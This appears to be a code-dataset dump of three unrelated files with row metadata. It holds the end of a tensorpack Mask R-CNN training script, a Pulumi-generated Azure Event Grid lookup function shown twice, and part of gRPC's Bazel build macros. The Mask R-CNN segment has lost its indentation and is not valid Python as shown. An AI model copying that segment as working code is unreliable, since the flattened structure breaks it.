rpn_losses + head_losses + [wd_cost], 'total_cost')
add_moving_summary(total_cost, wd_cost)
return total_cost
class ResNetC4Model(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR), tf.int32, 'anchor_labels'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR, 4), tf.float32, 'anchor_boxes'),
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')]
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
)
return ret
def backbone(self, image):
return [resnet_c4_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS[:3])]
def rpn(self, image, features, inputs):
featuremap = features[0]
rpn_label_logits, rpn_box_logits = rpn_head('rpn', featuremap, cfg.RPN.HEAD_DIM, cfg.RPN.NUM_ANCHOR)
anchors = RPNAnchors(get_all_anchors(), inputs['anchor_labels'], inputs['anchor_boxes'])
anchors = anchors.narrow_to(featuremap)
image_shape2d = tf.shape(image)[2:]
pred_boxes_decoded = anchors.decode_logits(rpn_box_logits)
proposal_boxes, proposal_scores = generate_rpn_proposals(
tf.reshape(pred_boxes_decoded, [-1, 4]),
tf.reshape(rpn_label_logits, [-1]),
image_shape2d,
cfg.RPN.TRAIN_PRE_NMS_TOPK if self.training else cfg.RPN.TEST_PRE_NMS_TOPK,
cfg.RPN.TRAIN_POST_NMS_TOPK if self.training else cfg.RPN.TEST_POST_NMS_TOPK)
if self.training:
losses = rpn_losses(
anchors.gt_labels, anchors.encoded_gt_boxes(), rpn_label_logits, rpn_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:]
featuremap = features[0]
gt_boxes, gt_labels, *_ = targets
if self.training:
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
boxes_on_featuremap = proposals.boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE)
roi_resized = roi_align(featuremap, boxes_on_featuremap, 14)
feature_fastrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1])
feature_gap = GlobalAvgPooling('gap', feature_fastrcnn, data_format='channels_first')
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs('fastrcnn', feature_gap, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits, gt_boxes,
tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
fg_feature = tf.gather(feature_fastrcnn, proposals.fg_inds())
mask_logits = maskrcnn_upXconv_head(
                    'maskrcnn', fg_feature, cfg.DATA.NUM_CATEGORY, num_convs=0)
                target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 14,
pad_border=False)
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
roi_resized = roi_align(featuremap, final_boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE), 14)
feature_maskrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1])
mask_logits = maskrcnn_upXconv_head(
                    'maskrcnn', feature_maskrcnn, cfg.DATA.NUM_CATEGORY, 0)
                indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
                final_mask_logits = tf.gather_nd(mask_logits, indices)
                tf.sigmoid(final_mask_logits, name='output/masks')
return []
class ResNetFPNModel(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image')]
num_anchors = len(cfg.RPN.ANCHOR_RATIOS)
for k in range(len(cfg.FPN.ANCHOR_STRIDES)):
ret.extend([
tf.TensorSpec((None, None, num_anchors), tf.int32,
'anchor_labels_lvl{}'.format(k + 2)),
tf.TensorSpec((None, None, num_anchors, 4), tf.float32,
'anchor_boxes_lvl{}'.format(k + 2))])
ret.extend([
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')])
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
)
return ret
def slice_feature_and_anchors(self, p23456, anchors):
for i, stride in enumerate(cfg.FPN.ANCHOR_STRIDES):
with tf.name_scope('FPN_slice_lvl{}'.format(i)):
anchors[i] = anchors[i].narrow_to(p23456[i])
def backbone(self, image):
c2345 = resnet_fpn_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS)
p23456 = fpn_model('fpn', c2345)
return p23456
def rpn(self, image, features, inputs):
assert len(cfg.RPN.ANCHOR_SIZES) == len(cfg.FPN.ANCHOR_STRIDES)
image_shape2d = tf.shape(image)[2:]
all_anchors_fpn = get_all_anchors_fpn()
multilevel_anchors = [RPNAnchors(
all_anchors_fpn[i],
inputs['anchor_labels_lvl{}'.format(i + 2)],
inputs['anchor_boxes_lvl{}'.format(i + 2)]) for i in range(len(all_anchors_fpn))]
self.slice_feature_and_anchors(features, multilevel_anchors)
rpn_outputs = [rpn_head('rpn', pi, cfg.FPN.NUM_CHANNEL, len(cfg.RPN.ANCHOR_RATIOS))
for pi in features]
multilevel_label_logits = [k[0] for k in rpn_outputs]
multilevel_box_logits = [k[1] for k in rpn_outputs]
multilevel_pred_boxes = [anchor.decode_logits(logits)
for anchor, logits in zip(multilevel_anchors, multilevel_box_logits)]
proposal_boxes, proposal_scores = generate_fpn_proposals(
multilevel_pred_boxes, multilevel_label_logits, image_shape2d)
if self.training:
losses = multilevel_rpn_losses(
multilevel_anchors, multilevel_label_logits, multilevel_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:]
assert len(features) == 5, "Features have to be P23456!"
gt_boxes, gt_labels, *_ = targets
if self.training:
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
fastrcnn_head_func = getattr(model_frcnn, cfg.FPN.FRCNN_HEAD_FUNC)
if not cfg.FPN.CASCADE:
roi_feature_fastrcnn = multilevel_roi_align(features[:4], proposals.boxes, 7)
head_feature = fastrcnn_head_func('fastrcnn', roi_feature_fastrcnn)
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs(
'fastrcnn/outputs', head_feature, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits,
gt_boxes, tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
else:
def roi_func(boxes):
return multilevel_roi_align(features[:4], boxes, 7)
fastrcnn_head = CascadeRCNNHead(
proposals, roi_func, fastrcnn_head_func,
(gt_boxes, gt_labels), image_shape2d, cfg.DATA.NUM_CLASS)
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
roi_feature_maskrcnn = multilevel_roi_align(
features[:4], proposals.fg_boxes(), 14,
name_scope='multilevel_roi_align_mask')
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
                    'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY)
                target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 28,
pad_border=False)
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
decoded_boxes = fastrcnn_head.decoded_output_boxes()
decoded_boxes = clip_boxes(decoded_boxes, image_shape2d, name='fastrcnn_all_boxes')
label_scores = fastrcnn_head.output_scores(name='fastrcnn_all_scores')
final_boxes, final_scores, final_labels = fastrcnn_predictions(
decoded_boxes, label_scores, name_scope='output')
if cfg.MODE_MASK:
roi_feature_maskrcnn = multilevel_roi_align(features[:4], final_boxes, 14)
maskrcnn_head_func = getattr(model_mrcnn, cfg.FPN.MRCNN_HEAD_FUNC)
mask_logits = maskrcnn_head_func(
                    'maskrcnn', roi_feature_maskrcnn, cfg.DATA.NUM_CATEGORY)
                indices = tf.stack([tf.range(tf.size(final_labels)), tf.cast(final_labels, tf.int32) - 1], axis=1)
                final_mask_logits = tf.gather_nd(mask_logits, indices)
                tf.sigmoid(final_mask_logits, name='output/masks')
return []
def do_visualize(model, model_path, nr_visualize=100, output_dir='output'):
df = get_train_dataflow()
df.reset_state()
pred = OfflinePredictor(PredictConfig(
model=model,
session_init=get_model_loader(model_path),
input_names=['image', 'gt_boxes', 'gt_labels'],
output_names=[
'generate_{}_proposals/boxes'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'generate_{}_proposals/scores'.format('fpn' if cfg.MODE_FPN else 'rpn'),
'fastrcnn_all_scores',
'output/boxes',
'output/scores',
'output/labels',
]))
if os.path.isdir(output_dir):
shutil.rmtree(output_dir)
utils.fs.mkdir_p(output_dir)
with tqdm.tqdm(total=nr_visualize) as pbar:
for idx, dp in itertools.islice(enumerate(df), nr_visualize):
img, gt_boxes, gt_labels = dp['image'], dp['gt_boxes'], dp['gt_labels']
rpn_boxes, rpn_scores, all_scores, \
final_boxes, final_scores, final_labels = pred(img, gt_boxes, gt_labels)
# draw groundtruth boxes
gt_viz = draw_annotation(img, gt_boxes, gt_labels)
# draw best proposals for each groundtruth, to show recall
proposal_viz, good_proposals_ind = draw_proposal_recall(img, rpn_boxes, rpn_scores, gt_boxes)
# draw the scores for the above proposals
score_viz = draw_predictions(img, rpn_boxes[good_proposals_ind], all_scores[good_proposals_ind])
results = [DetectionResult(*args) for args in
zip(final_boxes, final_scores, final_labels,
[None] * len(final_labels))]
final_viz = draw_final_outputs(img, results)
viz = tpviz.stack_patches([
gt_viz, proposal_viz,
score_viz, final_viz], 2, 2)
if os.environ.get('DISPLAY', None):
tpviz.interactive_imshow(viz)
cv2.imwrite("{}/{:03d}.png".format(output_dir, idx), viz)
pbar.update()
def do_evaluate(pred_config, output_file):
num_gpu = cfg.TRAIN.NUM_GPUS
graph_funcs = MultiTowerOfflinePredictor(
pred_config, list(range(num_gpu))).get_predictors()
for dataset in cfg.DATA.VAL:
logger.info("Evaluating {} ...".format(dataset))
dataflows = [
get_eval_dataflow(dataset, shard=k, num_shards=num_gpu)
for k in range(num_gpu)]
all_results = multithread_predict_dataflow(dataflows, graph_funcs)
output = output_file + '-' + dataset
DetectionDataset().eval_or_save_inference_results(all_results, dataset, output)
def do_predict(pred_func, input_file):
img = cv2.imread(input_file, cv2.IMREAD_COLOR)
results = predict_image(img, pred_func)
final = draw_final_outputs(img, results)
viz = np.concatenate((img, final), axis=1)
cv2.imwrite("output.png", viz)
logger.info("Inference output for {} written to output.png".format(input_file))
tpviz.interactive_imshow(viz)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--load', help='load a model for evaluation or training. Can overwrite BACKBONE.WEIGHTS')
parser.add_argument('--logdir', help='log directory', default='train_log/maskrcnn')
parser.add_argument('--visualize', action='store_true', help='visualize intermediate results')
parser.add_argument('--evaluate', help="Run evaluation. "
"This argument is the path to the output json evaluation file")
parser.add_argument('--predict', help="Run prediction on a given image. "
"This argument is the path to the input image file", nargs='+')
parser.add_argument('--config', help="A list of KEY=VALUE to overwrite those defined in config.py",
nargs='+')
if get_tf_version_tuple() < (1, 6):
# https://github.com/tensorflow/tensorflow/issues/14657
logger.warn("TF<1.6 has a bug which may lead to crash in FasterRCNN if you're unlucky.")
args = parser.parse_args()
if args.config:
cfg.update_args(args.config)
MODEL = ResNetFPNModel() if cfg.MODE_FPN else ResNetC4Model()
DetectionDataset()
if args.visualize or args.evaluate or args.predict:
if not tf.test.is_gpu_available():
from tensorflow.python.framework import test_util
assert get_tf_version_tuple() >= (1, 7) and test_util.IsMklEnabled(), \
"Inference requires either GPU support or MKL support!"
assert args.load
finalize_configs(is_training=False)
if args.predict or args.visualize:
cfg.TEST.RESULT_SCORE_THRESH = cfg.TEST.RESULT_SCORE_THRESH_VIS
if args.visualize:
do_visualize(MODEL, args.load)
else:
predcfg = PredictConfig(
model=MODEL,
session_init=get_model_loader(args.load),
input_names=MODEL.get_inference_tensor_names()[0],
output_names=MODEL.get_inference_tensor_names()[1])
if args.predict:
predictor = OfflinePredictor(predcfg)
for image_file in args.predict:
do_predict(predictor, image_file)
elif args.evaluate:
assert args.evaluate.endswith('.json'), args.evaluate
do_evaluate(predcfg, args.evaluate)
else:
is_horovod = cfg.TRAINER == 'horovod'
if is_horovod:
hvd.init()
logger.info("Horovod Rank={}, Size={}".format(hvd.rank(), hvd.size()))
if not is_horovod or hvd.rank() == 0:
logger.set_logger_dir(args.logdir, 'd')
logger.info("Environment Information:\n" + collect_env_info())
finalize_configs(is_training=True)
stepnum = cfg.TRAIN.STEPS_PER_EPOCH
init_lr = cfg.TRAIN.WARMUP_INIT_LR * min(8. / cfg.TRAIN.NUM_GPUS, 1.)
warmup_schedule = [(0, init_lr), (cfg.TRAIN.WARMUP, cfg.TRAIN.BASE_LR)]
warmup_end_epoch = cfg.TRAIN.WARMUP * 1. / stepnum
lr_schedule = [(int(warmup_end_epoch + 0.5), cfg.TRAIN.BASE_LR)]
factor = 8. / cfg.TRAIN.NUM_GPUS
for idx, steps in enumerate(cfg.TRAIN.LR_SCHEDULE[:-1]):
mult = 0.1 ** (idx + 1)
lr_schedule.append(
(steps * factor // stepnum, cfg.TRAIN.BASE_LR * mult))
logger.info("Warm Up Schedule (steps, value): " + str(warmup_schedule))
logger.info("LR Schedule (epochs, value): " + str(lr_schedule))
train_dataflow = get_train_dataflow()
total_passes = cfg.TRAIN.LR_SCHEDULE[-1] * 8 / train_dataflow.size()
logger.info("Total passes of the training set is: {:.5g}".format(total_passes))
callbacks = [
PeriodicCallback(
ModelSaver(max_to_keep=10, keep_checkpoint_every_n_hours=1),
every_k_epochs=20),
# linear warmup
ScheduledHyperParamSetter(
'learning_rate', warmup_schedule, interp='linear', step_based=True),
ScheduledHyperParamSetter('learning_rate', lr_schedule),
PeakMemoryTracker(),
EstimatedTimeLeft(median=True),
SessionRunTimeout(60000).set_chief_only(True), # 1 minute timeout
]
if cfg.TRAIN.EVAL_PERIOD > 0:
callbacks.extend([
EvalCallback(dataset, *MODEL.get_inference_tensor_names(), args.logdir)
for dataset in cfg.DATA.VAL
])
if not is_horovod:
callbacks.append(GPUUtilizationTracker())
if is_horovod and hvd.rank() > 0:
session_init = None
else:
if args.load:
session_init = get_model_loader(args.load)
else:
session_init = get_model_loader(cfg.BACKBONE.WEIGHTS) if cfg.BACKBONE.WEIGHTS else None
traincfg = TrainConfig(
model=MODEL,
data=QueueInput(train_dataflow),
callbacks=callbacks,
steps_per_epoch=stepnum,
max_epoch=cfg.TRAIN.LR_SCHEDULE[-1] * factor // stepnum,
session_init=session_init,
starting_epoch=cfg.TRAIN.STARTING_EPOCH
)
if is_horovod:
trainer = HorovodTrainer(average=False)
else:
# nccl mode appears faster than cpu mode
trainer = SyncMultiGPUTrainerReplicated(cfg.TRAIN.NUM_GPUS, average=False, mode='nccl')
launch_train_with_config(traincfg, trainer)
| true
| true
|
f70b75434414c84f9bbb1cf2d7b60ad9a8239b4c
| 3,882
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/eventgrid/latest/get_domain_topic.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 31
|
2020-09-21T09:41:01.000Z
|
2021-02-26T13:21:59.000Z
|
sdk/python/pulumi_azure_nextgen/eventgrid/latest/get_domain_topic.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 231
|
2020-09-21T09:38:45.000Z
|
2021-03-01T11:16:03.000Z
|
sdk/python/pulumi_azure_nextgen/eventgrid/latest/get_domain_topic.py
|
pulumi/pulumi-azure-nextgen
|
452736b0a1cf584c2d4c04666e017af6e9b2c15c
|
[
"Apache-2.0"
] | 4
|
2020-09-29T14:14:59.000Z
|
2021-02-10T20:38:16.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetDomainTopicResult',
'AwaitableGetDomainTopicResult',
'get_domain_topic',
]
warnings.warn("""The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.""", DeprecationWarning)
@pulumi.output_type
class GetDomainTopicResult:
"""
Domain Topic.
"""
def __init__(__self__, id=None, name=None, provisioning_state=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
"""
Fully qualified identifier of the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
Name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> Optional[str]:
"""
Provisioning state of the domain topic.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
"""
Type of the resource.
"""
return pulumi.get(self, "type")
class AwaitableGetDomainTopicResult(GetDomainTopicResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDomainTopicResult(
id=self.id,
name=self.name,
provisioning_state=self.provisioning_state,
type=self.type)
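    # Editorial note: `if False: yield self` makes __await__ a generator that
    # never yields, so awaiting this object completes immediately and returns
    # a plain GetDomainTopicResult.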
def get_domain_topic(domain_name: Optional[str] = None,
domain_topic_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDomainTopicResult:
"""
Domain Topic.
Latest API Version: 2020-06-01.
:param str domain_name: Name of the domain.
:param str domain_topic_name: Name of the topic.
:param str resource_group_name: The name of the resource group within the user's subscription.
"""
pulumi.log.warn("get_domain_topic is deprecated: The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.")
__args__ = dict()
__args__['domainName'] = domain_name
__args__['domainTopicName'] = domain_topic_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:eventgrid/latest:getDomainTopic', __args__, opts=opts, typ=GetDomainTopicResult).value
return AwaitableGetDomainTopicResult(
id=__ret__.id,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
type=__ret__.type)
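# Illustrative usage sketch (editorial addition; resource names are hypothetical):
#   result = get_domain_topic(domain_name="example-domain",
#                             domain_topic_name="example-topic",
#                             resource_group_name="example-rg")
#   pulumi.export("provisioningState", result.provisioning_state)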
| 34.660714
| 188
| 0.657908
|
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'GetDomainTopicResult',
'AwaitableGetDomainTopicResult',
'get_domain_topic',
]
warnings.warn("""The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.""", DeprecationWarning)
@pulumi.output_type
class GetDomainTopicResult:
def __init__(__self__, id=None, name=None, provisioning_state=None, type=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter
def id(self) -> str:
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> Optional[str]:
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
return pulumi.get(self, "type")
class AwaitableGetDomainTopicResult(GetDomainTopicResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetDomainTopicResult(
id=self.id,
name=self.name,
provisioning_state=self.provisioning_state,
type=self.type)
def get_domain_topic(domain_name: Optional[str] = None,
domain_topic_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetDomainTopicResult:
pulumi.log.warn("get_domain_topic is deprecated: The 'latest' version is deprecated. Please migrate to the function in the top-level module: 'azure-nextgen:eventgrid:getDomainTopic'.")
__args__ = dict()
__args__['domainName'] = domain_name
__args__['domainTopicName'] = domain_topic_name
__args__['resourceGroupName'] = resource_group_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-nextgen:eventgrid/latest:getDomainTopic', __args__, opts=opts, typ=GetDomainTopicResult).value
return AwaitableGetDomainTopicResult(
id=__ret__.id,
name=__ret__.name,
provisioning_state=__ret__.provisioning_state,
type=__ret__.type)
| true
| true
|
f70b75ad57c09c88cd88ad107f911048b4df0d20
| 11,050
|
bzl
|
Python
|
bazel/grpc_build_system.bzl
|
EnergySRE/grpc
|
0bf1c34237f8cd8d0b37673b2af17b1c410fcc9e
|
[
"Apache-2.0"
] | null | null | null |
bazel/grpc_build_system.bzl
|
EnergySRE/grpc
|
0bf1c34237f8cd8d0b37673b2af17b1c410fcc9e
|
[
"Apache-2.0"
] | null | null | null |
bazel/grpc_build_system.bzl
|
EnergySRE/grpc
|
0bf1c34237f8cd8d0b37673b2af17b1c410fcc9e
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This is for the gRPC build system. This isn't intended to be used outside of
# the BUILD file for gRPC. It contains the mapping for the template system we
# use to generate other platform's build system files.
#
# Please consider that there should be a high bar for additions and changes to
# this file.
# Each rule listed must be re-written for Google's internal build system, and
# each change must be ported from one to the other.
#
load("//bazel:cc_grpc_library.bzl", "cc_grpc_library")
load("@upb//bazel:upb_proto_library.bzl", "upb_proto_library")
load("@build_bazel_rules_apple//apple:ios.bzl", "ios_unit_test")
# The set of pollers to test against if a test exercises polling
POLLERS = ["epollex", "epoll1", "poll"]
def if_not_windows(a):
return select({
"//:windows": [],
"//:windows_msvc": [],
"//conditions:default": a,
})
def if_mac(a):
return select({
"//:mac_x86_64": a,
"//conditions:default": [],
})
def _get_external_deps(external_deps):
ret = []
for dep in external_deps:
if dep == "address_sorting":
ret += ["//third_party/address_sorting"]
elif dep == "cares":
ret += select({
"//:grpc_no_ares": [],
"//conditions:default": ["//external:cares"],
})
elif dep == "cronet_c_for_grpc":
ret += ["//third_party/objective_c/Cronet:cronet_c_for_grpc"]
elif dep.startswith("absl/"):
ret += ["@com_google_absl//" + dep]
else:
ret += ["//external:" + dep]
return ret
def grpc_cc_library(
name,
srcs = [],
public_hdrs = [],
hdrs = [],
external_deps = [],
deps = [],
standalone = False,
language = "C++",
testonly = False,
visibility = None,
alwayslink = 0,
data = [],
use_cfstream = False,
tags = []):
copts = []
if use_cfstream:
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
linkopts = if_not_windows(["-pthread"])
if use_cfstream:
linkopts = linkopts + if_mac(["-framework CoreFoundation"])
native.cc_library(
name = name,
srcs = srcs,
defines = select({
"//:grpc_no_ares": ["GRPC_ARES=0"],
"//conditions:default": [],
}) +
select({
"//:remote_execution": ["GRPC_PORT_ISOLATED_RUNTIME=1"],
"//conditions:default": [],
}) +
select({
"//:grpc_allow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=1"],
"//:grpc_disallow_exceptions": ["GRPC_ALLOW_EXCEPTIONS=0"],
"//conditions:default": [],
}) +
if_mac(["INSTALL_PREFIX=/usr/local"]),
hdrs = hdrs + public_hdrs,
deps = deps + _get_external_deps(external_deps),
copts = copts,
visibility = visibility,
testonly = testonly,
linkopts = linkopts,
includes = [
"include",
"src/core/ext/upb-generated", # Once upb code-gen issue is resolved, remove this.
],
alwayslink = alwayslink,
data = data,
tags = tags,
)
def grpc_proto_plugin(name, srcs = [], deps = []):
native.cc_binary(
name = name,
srcs = srcs,
deps = deps,
)
def grpc_proto_library(
name,
srcs = [],
deps = [],
well_known_protos = False,
has_services = True,
use_external = False,
generate_mocks = False):
cc_grpc_library(
name = name,
srcs = srcs,
deps = deps,
well_known_protos = well_known_protos,
proto_only = not has_services,
use_external = use_external,
generate_mocks = generate_mocks,
)
def ios_cc_test(
name,
tags = [],
**kwargs):
ios_test_adapter = "//third_party/objective_c/google_toolbox_for_mac:GTM_GoogleTestRunner_GTM_USING_XCTEST"
test_lib_ios = name + "_test_lib_ios"
ios_tags = tags + ["manual", "ios_cc_test"]
if not any([t for t in tags if t.startswith("no_test_ios")]):
native.objc_library(
name = test_lib_ios,
srcs = kwargs.get("srcs"),
deps = kwargs.get("deps"),
copts = kwargs.get("copts"),
tags = ios_tags,
alwayslink = 1,
testonly = 1,
)
ios_test_deps = [ios_test_adapter, ":" + test_lib_ios]
ios_unit_test(
name = name + "_on_ios",
size = kwargs.get("size"),
tags = ios_tags,
minimum_os_version = "9.0",
deps = ios_test_deps,
)
def grpc_cc_test(name, srcs = [], deps = [], external_deps = [], args = [], data = [], uses_polling = True, language = "C++", size = "medium", timeout = None, tags = [], exec_compatible_with = [], exec_properties = {}, shard_count = None, flaky = None):
copts = if_mac(["-DGRPC_CFSTREAM"])
if language.upper() == "C":
copts = copts + if_not_windows(["-std=c99"])
# NOTE: these attributes won't be used for the poller-specific versions of a test
# automatically, you need to set them explicitly (if applicable)
args = {
"srcs": srcs,
"args": args,
"data": data,
"deps": deps + _get_external_deps(external_deps),
"copts": copts,
"linkopts": if_not_windows(["-pthread"]),
"size": size,
"timeout": timeout,
"exec_compatible_with": exec_compatible_with,
"exec_properties": exec_properties,
"shard_count": shard_count,
"flaky": flaky,
}
if uses_polling:
# the vanilla version of the test should run on platforms that only
# support a single poller
native.cc_test(
name = name,
testonly = True,
tags = (tags + [
"no_linux", # linux supports multiple pollers
]),
**args
)
# on linux we run the same test multiple times, once for each poller
for poller in POLLERS:
native.sh_test(
name = name + "@poller=" + poller,
data = [name] + data,
srcs = [
"//test/core/util:run_with_poller_sh",
],
size = size,
timeout = timeout,
args = [
poller,
"$(location %s)" % name,
] + args["args"],
tags = (tags + ["no_windows", "no_mac"]),
exec_compatible_with = exec_compatible_with,
exec_properties = exec_properties,
shard_count = shard_count,
flaky = flaky,
)
else:
# the test behavior doesn't depend on polling, just generate the test
native.cc_test(name = name, tags = tags + ["no_uses_polling"], **args)
ios_cc_test(
name = name,
tags = tags,
**args
)
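# Editorial note (inferred from the macro above; target names are examples):
# grpc_cc_test(name = "foo_test", uses_polling = True) produces a "foo_test"
# cc_test tagged "no_linux" plus Linux-only sh_test wrappers
# "foo_test@poller=epollex", "foo_test@poller=epoll1" and
# "foo_test@poller=poll", and an iOS variant "foo_test_on_ios".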
def grpc_cc_binary(name, srcs = [], deps = [], external_deps = [], args = [], data = [], language = "C++", testonly = False, linkshared = False, linkopts = [], tags = []):
copts = []
if language.upper() == "C":
copts = ["-std=c99"]
native.cc_binary(
name = name,
srcs = srcs,
args = args,
data = data,
testonly = testonly,
linkshared = linkshared,
deps = deps + _get_external_deps(external_deps),
copts = copts,
linkopts = if_not_windows(["-pthread"]) + linkopts,
tags = tags,
)
def grpc_generate_one_off_targets():
# In open-source, grpc_objc* libraries depend directly on //:grpc
native.alias(
name = "grpc_objc",
actual = "//:grpc",
)
def grpc_generate_objc_one_off_targets():
pass
def grpc_sh_test(name, srcs, args = [], data = []):
native.sh_test(
name = name,
srcs = srcs,
args = args,
data = data,
)
def grpc_sh_binary(name, srcs, data = []):
native.sh_binary(
name = name,
srcs = srcs,
data = data,
)
def grpc_py_binary(
name,
srcs,
data = [],
deps = [],
